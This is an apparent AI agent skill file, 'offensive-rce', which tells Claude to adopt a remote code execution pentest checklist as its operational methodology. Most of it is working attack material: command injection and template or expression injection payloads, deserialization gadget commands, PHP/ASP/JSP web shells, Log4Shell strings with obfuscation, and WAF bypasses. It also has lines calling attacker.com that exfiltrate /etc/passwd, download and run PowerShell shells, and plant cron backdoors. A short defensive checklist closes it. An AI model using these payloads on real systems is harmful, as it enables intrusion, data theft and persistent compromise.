> offensive-rce
offensive-rce skill from SnailSploit/Claude-Red
curl "https://skillshub.wtf/SnailSploit/Claude-Red/offensive-rce?format=md"SKILL: Remote Code Execution
Metadata
- Skill Name: rce
- Folder: offensive-rce
- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/rce.md
Description
Remote Code Execution testing checklist: OS command injection, SSTI-to-RCE, deserialization RCE, file upload RCE, XXE with SSRF to RCE, RCE via dependency confusion, and CVE-based RCE patterns. Use for web app pentests and bug bounty RCE discovery.
Trigger Phrases
Use this skill when the conversation involves any of:
RCE, remote code execution, command injection, OS injection, SSTI RCE, deserialization RCE, file upload RCE, XXE RCE, dependency confusion, code execution
Instructions for Claude
When this skill is active:
- Load and apply the full methodology below as your operational checklist
- Follow steps in order unless the user specifies otherwise
- For each technique, consider applicability to the current target/context
- Track which checklist items have been completed
- Suggest next steps based on findings
Full Methodology
Remote Code Execution
occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or misconfiguration.
Shortcut
- Identify suspicious user input locations. for code injections, take note of every user input location, including URL parameters, HTTP headers, body parameters, and file uploads. to find potential file inclusion vulnerabilities, check for input locations being used to inclusion vulnerabilities, check for input locations being used to determine or, construct filenames and, for file upload functions.
- Submit test payloads to the input locations in order to detect potential vulnerabilities.
- If your requests are blocked, try protection bypass techniques and see if your payload succeeds.
- Finally, confirm the vulnerability by trying to execute harmless commands such as
whoami,ls, and,sleep 5.
Mechanisms
Code Injection
This program takes a user input string, pass it through eval() and return the results:
def calculate(input):
return eval("{}".format(input))
result = calculate(user_input.calc)
print("The result is {}.".format(result))
an attacker could provide the application with something more malicious instead:
GET /calculator?calc="__import__('os').system('ls')"
Host: example.com
File Inclusion
making the target server include a file containing malicious code.
<?php
// Some PHP code
$file = $_GET["page"];
include $file;
// Some PHP code
?>
if the application doesn't limit which file the user includes with the page parameter, an attacker can include a malicious PHP file.
<?PHP
system($_GET["cmd"]);
?>
and then they can run commands:
http://example.com/?page=http://attacker.com/malicious.php?cmd=ls
Command Injection
Untrusted data flows into OS command execution APIs.
Examples:
subprocess.run("ping -c 1 " + user, shell=True) # vulnerable
subprocess.run(["ping", "-c", "1", user], shell=False) # safer
Detect via time/delay payloads (&& sleep 5), OAST/DNS callbacks, and out-of-band responses.
Server-Side Template Injection (SSTI)
User-controlled template strings evaluated by template engines (Jinja2, Twig, Freemarker, Thymeleaf) can lead to RCE.
Probe with arithmetic/concat markers, escalate using engine-specific object graphs. Tools: tplmap.
Insecure Deserialization
Deserializing untrusted data (Java, .NET, PHP, Python pickle) can trigger gadget chains to RCE.
Test with known gadget payloads (e.g., ysoserial, marshalsec), and observe blind effects via OAST.
Unsafe YAML and Config Parsers
Loading YAML with object constructors (yaml.load vs safe_load) can lead to code execution.
File Upload → Processing Chains
Upload parsers (ImageMagick, ExifTool, video transcoders) may execute/parse complex formats leading to RCE. Test with harmless PoCs and OAST.
Hunt
1. Identify Input Vectors
Map all user-controlled input that could lead to code execution:
- Command-line argument injection: APIs that execute shell commands, CLI tools, system utilities
- Template engines: User-provided templates or template variables (Jinja2, Twig, Freemarker, Thymeleaf, ERB, Handlebars)
- File uploads: Server-side processing of images, documents, archives, media files
- Deserialization endpoints: APIs accepting serialized objects (Java, .NET, Python pickle, PHP serialize, Ruby Marshal)
- Expression Language fields: Search filters, calculations, dynamic queries (SpEL, OGNL, MVEL, EL)
- Webhook URLs: Server-side fetches triggered by user-supplied URLs
- Log file paths: Log injection leading to log processing (LogForge, Log4Shell)
- Configuration files: Upload or modification of config files (.htaccess, web.config, cron jobs)
- Email/document processing: Mail parsers, PDF generators, office document converters
- Image manipulation: ImageMagick, GraphicsMagick, Pillow, GD library operations
- Video/audio processing: FFmpeg, ExifTool, media transcoders
2. Test Payloads by Context
Command Injection Payloads
Linux/Unix:
# Basic injection
; whoami
| whoami
|| whoami
& whoami
&& whoami
`whoami`
$(whoami)
# Time-based detection
; sleep 10
| sleep 10 &
|| ping -c 10 127.0.0.1
# Out-of-band (OAST)
; nslookup $(whoami).attacker.com
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/?data=$(cat /etc/passwd | base64)
# Space bypasses
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
# Command obfuscation
c''at /etc/passwd
c\at /etc/passwd
c"a"t /etc/passwd
$(echo Y2F0IC9ldGMvcGFzc3dk | base64 -d)
# Wildcard injection
/???/??t /???/??ss??
/???/n? 127.0.0.1
# Variable expansion
a=w;b=hoami;$a$b
Windows:
# Basic injection
& whoami
&& whoami
| whoami
|| whoami
; whoami
# Newline injection
%0a whoami
# Time-based
| ping -n 10 127.0.0.1
& timeout /t 10
# OAST
& nslookup %USERNAME%.attacker.com
& certutil -urlcache -split -f http://attacker.com/beacon
# PowerShell execution
& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
Server-Side Template Injection (SSTI) Payloads
Jinja2 (Python - Flask, Ansible):
# Detection
{{7*7}} # Returns 49
{{7*'7'}} # Returns 7777777
# Reconnaissance
{{config}}
{{config.items()}}
{{self}}
{%debug%}
# RCE via __subclasses__
{{''.__class__.__mro__[1].__subclasses__()}}
# Find useful classes
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('whoami').read()}}
# subprocess.Popen
{{''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True,stdout=-1).communicate()}}
# Modern bypass (Python 3)
{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}
# Lipsum object abuse
{{lipsum.__globals__['os'].popen('whoami').read()}}
# Cycler object
{{cycler.__init__.__globals__.os.popen('whoami').read()}}
Twig (PHP - Symfony):
# Detection
{{7*7}}
# RCE
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("whoami")}}
# Alternative
{{_self.env.enableDebug()}}
{{_self.env.isDebug()}}
# PHP filter chain (modern)
{{["id"]|filter("system")}}
Freemarker (Java):
# Detection
${7*7}
# RCE
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("whoami")}
# Alternative
<#assign classLoader=object?api.class.protectionDomain.classLoader>
<#assign clazz=classLoader.loadClass("java.lang.Runtime")>
<#assign method=clazz.getMethod("getRuntime",null)>
<#assign runtime=method.invoke(null,null)>
<#assign method=clazz.getMethod("exec",classLoader.loadClass("java.lang.String"))>
${method.invoke(runtime,"whoami")}
Thymeleaf (Java - Spring):
# Detection
[[${7*7}]]
# RCE
${T(java.lang.Runtime).getRuntime().exec('whoami')}
[[${T(java.lang.Runtime).getRuntime().exec('whoami')}]]
# Spring EL alternative
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream())}
ERB (Ruby - Rails):
# Detection
<%= 7*7 %>
# RCE
<%= system("whoami") %>
<%= `whoami` %>
<%= IO.popen('whoami').readlines() %>
<%= %x(whoami) %>
Velocity (Java):
# Detection
#set($x = 7 * 7)$x
# RCE
#set($rt = $class.forName("java.lang.Runtime"))
#set($chr = $class.forName("java.lang.Character"))
#set($str = $class.forName("java.lang.String"))
#set($ex=$rt.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$chr.toString($out.read())
#end
Handlebars (JavaScript/Node.js):
# Detection
{{7*7}}
# RCE (if helper is vulnerable)
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').execSync('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
Expression Language (EL) Injection
Spring SpEL (Spring Framework):
# Detection
${7*7}
#{7*7}
# RCE
${T(java.lang.Runtime).getRuntime().exec('whoami')}
#{T(java.lang.Runtime).getRuntime().exec('whoami')}
# Alternative methods
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream())}
# Bypass blacklist
${T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"whoami"})}
OGNL (Object-Graph Navigation Language - Struts):
# Detection
${7*7}
# RCE
${@java.lang.Runtime@getRuntime().exec('whoami')}
# CVE-2017-5638 (Content-Type exploitation)
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
MVEL (MVFLEX Expression Language):
# Detection
${7*7}
# RCE
Runtime.getRuntime().exec("whoami");
Deserialization Payloads
Java (using ysoserial):
# Generate payload
java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/beacon' | base64
# Popular gadget chains
ysoserial CommonsCollections1
ysoserial CommonsCollections6
ysoserial CommonsCollections7
ysoserial Spring1
ysoserial Spring2
ysoserial Jdk7u21
ysoserial Hibernate1
.NET (using ysoserial.net):
# Generate payload
ysoserial.exe -g ObjectDataProvider -f Json -c "calc.exe"
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "powershell.exe -c whoami"
# Gadgets
TypeConfuseDelegate
ObjectDataProvider
PSObject
WindowsIdentity
Python pickle:
import pickle
import base64
import os
class RCE:
def __reduce__(self):
return (os.system, ('whoami',))
payload = pickle.dumps(RCE())
print(base64.b64encode(payload))
PHP serialize:
# Magic methods for exploitation
__wakeup()
__destruct()
__toString()
# Example payload
O:8:"stdClass":1:{s:4:"file";s:17:"/etc/passwd";}
3. Advanced Techniques
Blind RCE Detection
Time-Based:
# Linux
; sleep 10
| ping -c 10 127.0.0.1
| timeout 10
# Windows
| ping -n 10 127.0.0.1
& timeout /t 10
Out-of-Band (OAST) using Burp Collaborator:
# DNS exfiltration
; nslookup $(whoami).burpcollaborator.net
; dig $(whoami).burpcollaborator.net
# HTTP callback
; curl http://burpcollaborator.net
; wget http://burpcollaborator.net/$(whoami)
# DNS with data exfiltration
; cat /etc/passwd | base64 | xargs -I {} nslookup {}.burpcollaborator.net
Bypass Techniques
Blacklist Bypasses:
# Case variation
WhOaMi
wH%6f%61%6Di
# Encoding
wh\u006fami
wh\x6fami
echo "d2hvYW1p" | base64 -d | sh
# Line continuation
wh\
oami
# Comments (bash)
wh#comment
oami
# Null byte (legacy)
whoami%00.jpg
WAF Bypasses:
# Unicode/encoding
wh\u006fami
# Hex encoding
\x77\x68\x6f\x61\x6d\x69
# Concatenation
'wh'+'oami'
"wh"+"oami"
# Variable expansion
a=w;b=hoami;$a$b
4. Confirm the Vulnerability
Execute harmless commands to prove RCE without causing damage:
# Safe verification commands
whoami
id
pwd
hostname
uname -a
cat /etc/issue
systeminfo (Windows)
# Create proof file
echo "pwned_by_researcher" > /tmp/proof.txt
# Time-based confirmation
sleep 10 && curl http://attacker.com/confirmed
Practical Tactics:
- Use time-based payloads for blind cases; confirm via differential latency (baseline vs payload response time)
- Use OAST (Burp Collaborator, Interactsh) to detect out-of-band DNS/HTTP callbacks
- For deserialization, try signed/unsigned object tampering and gadget canaries
- For uploads, verify server-side processing paths (thumbnails, metadata extraction, AV scanning windows)
- Test multiple injection points in parallel; backend queue processing may delay execution
- Monitor server-side logs if accessible (error logs often reveal stack traces)
Vulnerabilities
File Upload → RCE Chains
1. Web Shell Upload
PHP Web Shells:
# Minimal shell
<?php system($_GET['c']); ?>
# Bypass extension filters
shell.php.jpg
shell.php%00.jpg # Null byte (PHP <5.3)
shell.php%0a.jpg # Newline
shell.php..... # Multiple dots
shell.pHp # Case variation
shell.php%20 # Trailing space
shell.php::$DATA # Windows NTFS ADS
shell.php/ # Trailing slash (IIS)
# Content-Type manipulation
Content-Type: image/jpeg
Content-Disposition: form-data; name="file"; filename="shell.php.jpg"
# Polyglot files (valid image + PHP)
GIF89a<?php system($_GET['c']); ?>
ASP/ASPX Shells:
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<% Process.Start("cmd.exe", "/c " + Request["c"]); %>
JSP Shells:
<% Runtime.getRuntime().exec(request.getParameter("c")); %>
2. .htaccess / web.config Injection
.htaccess to enable PHP in images:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
# Alternative
<FilesMatch "\.jpg$">
SetHandler application/x-httpd-php
</FilesMatch>
web.config to enable ASP in images:
<configuration>
<system.webServer>
<handlers>
<add name="jpg" path="*.jpg" verb="*" type="System.Web.UI.PageHandlerFactory" />
</handlers>
</system.webServer>
</configuration>
3. Archive Extraction (Zip Slip - CVE-2018-1002200)
# Create malicious zip with path traversal
ln -s ../../../../../../../etc/cron.d/evil evil.txt
zip --symlinks evil.zip evil.txt
# Or craft manually with path traversal
evil/
../../../../var/www/html/shell.php
../../../../etc/cron.d/backdoor
Testing:
- Upload zip/tar containing paths with
../ - Symlink to sensitive locations
- Overwrite cron jobs, SSH keys, web roots
4. ImageMagick Exploits
ImageTragick (CVE-2016-3714):
push graphic-context
viewbox 0 0 640 480
fill 'url(https://attacker.com/shell.jpg"|whoami")'
pop graphic-context
Modern ImageMagick RCE (CVE-2022-44268):
# Arbitrary file read
convert -size 1x1 xc:red -set "profile:1" "/etc/passwd" exploit.png
# Exploitation
convert exploit.png output.png
identify -verbose output.png | grep "Raw profile type"
Other ImageMagick vectors:
- MSL (Magick Scripting Language) injection
- Label injection for RCE
- SVG with embedded scripts
5. PDF Processing RCE
PDF with JavaScript:
app.alert({ cMsg: "XSS", cTitle: "XSS" });
// File system access (if enabled)
this.exportDataObject({ cName: "test", nLaunch: 2 });
LaTeX Injection:
\documentclass{article}
\immediate\write18{whoami}
\begin{document}
Hello World
\end{document}
# Alternative
\input{|"whoami"}
XSL-FO Injection (Apache FOP):
<fo:instream-foreign-object>
<svg:svg>
<svg:script>java.lang.Runtime.getRuntime().exec("whoami")</svg:script>
</svg:svg>
</fo:instream-foreign-object>
6. Office Document Processing
XXE in DOCX/XLSX:
# Extract document1.xml from DOCX
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<document>&xxe;</document>
Macro-enabled Documents:
- DOCM, XLSM, PPTM files with VBA macros
- Excel 4.0 macros (XLM) bypass modern protections
- DDE (Dynamic Data Exchange) injection
LibreOffice/OpenOffice Exploits:
- CVE-2023-2255: Remote code execution via crafted documents
- Python macro execution in LibreOffice
Log4Shell (CVE-2021-44228)
Basic Payloads:
${jndi:ldap://attacker.com/a}
${jndi:rmi://attacker.com/a}
${jndi:dns://attacker.com/a}
# Common injection points
User-Agent: ${jndi:ldap://attacker.com/a}
X-Api-Version: ${jndi:ldap://attacker.com/a}
Referer: ${jndi:ldap://attacker.com/a}
Obfuscation Bypasses:
# Lowercase/uppercase
${${lower:j}ndi:ldap://attacker.com/a}
${${upper:j}ndi:ldap://attacker.com/a}
# Environment variables
${j${env:NOTHING:-n}di:ldap://attacker.com/a}
# Nested lookups
${jnd${sys:java.version:-i}:ldap://attacker.com/a}
# Multiple levels
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/a}
Setup LDAP server for exploitation:
# Using marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker.com/#Exploit" 1389
# Exploit.java - compile and host
public class Exploit {
static {
try {
Runtime.getRuntime().exec("curl http://attacker.com/pwned");
} catch (Exception e) {}
}
}
Prototype Pollution → RCE (Node.js)
Pollute Object prototype:
// Via JSON
{"__proto__": {"isAdmin": true}}
{"constructor": {"prototype": {"isAdmin": true}}}
// Via query parameters
?__proto__[isAdmin]=true
?constructor[prototype][isAdmin]=true
Escalate to RCE:
// Pollute child_process options
{
"__proto__": {
"shell": "/bin/sh",
"argv0": "console.log(require('child_process').execSync('whoami').toString())//"
}
}
// Pollute via NODE_OPTIONS
{"__proto__": {"NODE_OPTIONS": "--require /tmp/malicious.js"}}
// CVE-2022-21824 - Prototype pollution in VM module
FFmpeg / ExifTool Exploits
FFmpeg SSRF (CVE-2016-1897, CVE-2016-1898):
# Playlist SSRF
concat:http://attacker.com/playlist|file:///etc/passwd
# HLS SSRF
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://internal.server/admin
ExifTool RCE (CVE-2021-22204):
# Create malicious image with DjVu exploit
exiftool -config exploit.config '-HasselbladExif<=exploit.jpg' malicious.jpg
SQL Injection → RCE
MySQL:
-- Write web shell
SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
-- Read file
LOAD_FILE('/etc/passwd');
-- UDF exploitation
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('whoami');
PostgreSQL:
-- COPY TO PROGRAM (9.3+)
COPY (SELECT '') TO PROGRAM 'curl http://attacker.com/beacon';
-- Large Object + lo_export
SELECT lo_create(-1);
INSERT INTO pg_largeobject VALUES (-1, 0, decode('<?php system($_GET["c"]); ?>', 'base64'));
SELECT lo_export(-1, '/var/www/html/shell.php');
MSSQL:
-- xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
-- OLE Automation
EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT;
EXEC sp_OAMethod @shell, 'Run', NULL, 'cmd /c whoami';
Container Escape → RCE
Docker Socket Exposure:
# If /var/run/docker.sock is mounted
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host sh
Privileged Container:
# From privileged container
mkdir /tmp/exploit
mount /dev/sda1 /tmp/exploit
chroot /tmp/exploit sh
Kernel Exploits:
- Dirty COW (CVE-2016-5195)
- DirtyPipe (CVE-2022-0847)
- DirtyCred (CVE-2022-2588)
Chaining and Escalation
1. Path Traversal → RCE
# Overwrite SSH authorized_keys
PUT /upload?path=../../.ssh/authorized_keys
# Overwrite cron job
PUT /upload?path=../../etc/cron.d/backdoor
Content: * * * * * root curl http://attacker.com/shell.sh | bash
# Overwrite bash profile
PUT /upload?path=../../.bashrc
# Overwrite PHP auto-prepend
PUT /upload?path=../../.user.ini
Content: auto_prepend_file=/tmp/shell.php
2. SSRF → RCE
# SSRF to cloud metadata → IAM creds
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# SSRF to internal admin → RCE
http://internal:8080/admin/exec?cmd=whoami
# SSRF to Redis → cron job
http://localhost:6379
CONFIG SET dir /etc/cron.d/
CONFIG SET dbfilename root
SET 1 "* * * * * root curl http://attacker.com/shell.sh | bash"
SAVE
3. XXE → RCE
# XXE + PHP expect wrapper
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://whoami">
]>
<root>&xxe;</root>
# XXE + JAR protocol (Java)
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "jar:http://attacker.com/malicious.jar!/payload.class">
]>
4. SSTI → File Write → RCE
# Jinja2 write web shell
{{''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/shell.php','w').write('<?php system($_GET["c"]); ?>')}}
Real-World CVEs and Cases
Critical RCE Vulnerabilities
-
CVE-2021-44228 - Log4Shell (Apache Log4j):
- JNDI injection in logging library
- Affected: Minecraft, VMware, Cisco, countless others
- Impact: Unauthenticated RCE on millions of systems
-
CVE-2022-22965 - Spring4Shell (Spring Framework):
- Class loader manipulation via property binding
- Impact: RCE on Spring MVC applications
-
CVE-2021-3129 - Laravel Debug Mode RCE:
- Ignition debug page deserialization
- Impact: Unauthenticated RCE on Laravel apps with debug enabled
-
CVE-2019-0193 - Apache Solr RCE:
- Velocity template injection
- Impact: Unauthenticated RCE on Solr instances
-
CVE-2017-5638 - Apache Struts2 RCE:
- OGNL injection via Content-Type header
- Impact: Led to Equifax breach affecting 147M people
-
CVE-2020-1938 - Ghostcat (Apache Tomcat):
- AJP protocol file read/inclusion
- Impact: RCE via arbitrary file write
-
CVE-2022-26134 - Confluence RCE:
- OGNL injection in Confluence Server/Data Center
- Impact: Unauthenticated RCE
-
CVE-2018-1002200 - Kubernetes Arbitrary File Overwrite (Zip Slip):
- Path traversal in tar/zip extraction
- Impact: Container escape via kubectl cp
-
CVE-2016-3714 - ImageTragick (ImageMagick):
- Command injection via image processing
- Impact: RCE on image upload features
-
CVE-2021-22204 - ExifTool RCE:
- DjVu metadata command injection
- Impact: RCE via image metadata parsing
Impact Categories
- Critical: Unauthenticated RCE on internet-facing services
- High: Authenticated RCE or unauthenticated RCE requiring interaction
- Medium: RCE requiring specific configuration or low-privilege authentication
- Low: RCE requiring admin access or highly specific conditions
Remediation Recommendations
Avoid inserting user input into code that gets evaluated. Also treat user uploaded files as untrusted, and avoid including file based on user input.
Defensive Checklist
- Eliminate Dangerous Functions: Remove
eval,exec,Function,subprocess.shell=True,Runtime.exec()where possible - Parameterized Execution: Use parameterized/array-based process execution (
shell=False); escape+allowlist arguments - Template Engine Hardening: Disable dangerous functions/tags; enable sandbox mode; don't accept user templates
- Strict Upload Validation:
- Enforce content-type AND extension checks
- Verify via magic bytes (file signature)
- Re-encode/process files (strip metadata with exiftool -all=)
- Store uploads outside web root
- Sandbox File Processing:
- Process uploads in isolated containers/VMs
- Use seccomp, AppArmor, SELinux restrictions
- Run as non-root with minimal permissions
- No network access during processing
- Delay publish until validation completes
- Safe Deserialization:
- Prefer JSON/XML with strict schemas
- Sign and verify serialized data
- Avoid
pickle,marshal, native object graphs - Use allowlists for permitted classes
- Dependency Management:
- Keep libraries updated (ImageMagick, ExifTool, FFmpeg, Log4j, etc.)
- Pin versions and audit dependencies
- Subscribe to security advisories
- Use tools:
npm audit,pip-audit,OWASP Dependency-Check
- Network Segmentation:
- Implement egress filtering to prevent OAST callbacks
- Restrict outbound connections from app servers
- Monitor DNS queries for suspicious patterns
- WAF/RASP:
- Deploy Web Application Firewall with RCE signatures
- Consider Runtime Application Self-Protection (RASP)
- Log and alert on suspicious payloads
- Log4Shell Specific:
- Update to Log4j 2.17.1+
- Set
log4j2.formatMsgNoLookups=true - Remove JndiLookup class from classpath
- Monitor for obfuscated JNDI patterns
Testing Tools
- SSTI:
tplmap,SSTImap - Deserialization:
ysoserial,ysoserial.net,marshalsec - Command Injection: Burp Intruder,
commix - General: Burp ActiveScan,
nucleitemplates,jaelessignatures - OAST: Burp Collaborator, Interactsh, canarytokens.org
> related_skills --same-repo
> offensive-xxe
offensive-xxe skill from SnailSploit/Claude-Red
> offensive-xss
offensive-xss skill from SnailSploit/Claude-Red
> offensive-windows-mitigations
offensive-windows-mitigations skill from SnailSploit/Claude-Red
> offensive-windows-boundaries
offensive-windows-boundaries skill from SnailSploit/Claude-Red